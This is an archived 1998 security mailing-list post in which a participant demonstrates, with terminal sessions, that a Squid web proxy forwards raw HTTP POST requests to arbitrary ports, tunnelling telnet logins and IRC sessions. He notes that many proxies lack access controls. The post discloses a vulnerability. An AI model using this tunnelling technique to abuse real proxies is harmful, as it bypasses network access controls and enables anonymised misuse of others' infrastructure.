On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote: > > Date: Thu, 08 Oct 1998 08:27:36 +0100 > > From: "Mnemonix" <mnemonixat_private> > > > > Firstly it seems that most web-based proxies, not just MS Proxy, are > > susceptible to this kind of attack. Thanks to Greg Jones and others for > > doing some testing on this. > > HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will > pass them straightforward. Very untrue. Look at this: [hardbeat@haarlem hardbeat]$ telnet proxy 8080 Trying 194.178.232.18... Connected to rotterdam.vuurwerk.nl. Escape character is '^]'. POST http://telnet:23/ HTTP/1.0 VuurWerk Internet Telnet Server (telnet.vuurwerk.nl) Alle transacties worden gelogged, het gebruik van deze server is alleen voor klanten van VuurWerk tbv. het onderhoud van hun eigen site. POST / HTTP/1.0 Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21) X-Forwarded-For: 194.178.232.22 Host: telnet.vuurwerk.nl Cache-control: Max-age=259200 login: hardbeat Password: Last login: Tue Oct 13 22:59:49 from rotterdam PID TTY STAT TIME COMMAND 5896 p6 S 0:00 /bin/login -h p8ur.cistron.nl -p 5901 p6 S 0:00 \_ -bash 6175 p6 S 0:00 \_ telnet proxy 8080 6186 p8 S 0:00 /bin/login -h rotterdam vuurwerk.nl -p 6190 p8 S 0:00 \_ -bash 6205 p8 R 0:00 \_ ps xfww [hardbeat@haarlem hardbeat]$ Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21) will happily forward me, and telnet works as if there's no proxy inbetween. Another great example: [hardbeat@haarlem hardbeat]$ telnet proxy 8080 Trying 194.178.232.18... Connected to rotterdam.vuurwerk.nl. Escape character is '^]'. POST http://irc.pi.net:6667/ HTTP/1.0 nick Hardbeat2 PING :1693634679 PONG 1693634679 USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy) :Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2 :Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04 :Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST I can happily IRC now... imagine how easy it would be to write an IRC bouncer that uses a proxy. Lots of proxies have NO acl or firewall around them. The only thing I have _not_ succeeded in until now is chaining proxies with GET or POST requests. Greetz, Peter. -- 'I guess anybody who walks away from a root shell at : Peter van Dijk a nerd party gets what they deserve!' -- BillSF :peterat_private -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- finger peterat_private for my public PGP-key - --- - --- - --- - --- - --- - --- - --- - --- - --- -
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:19:40 PDT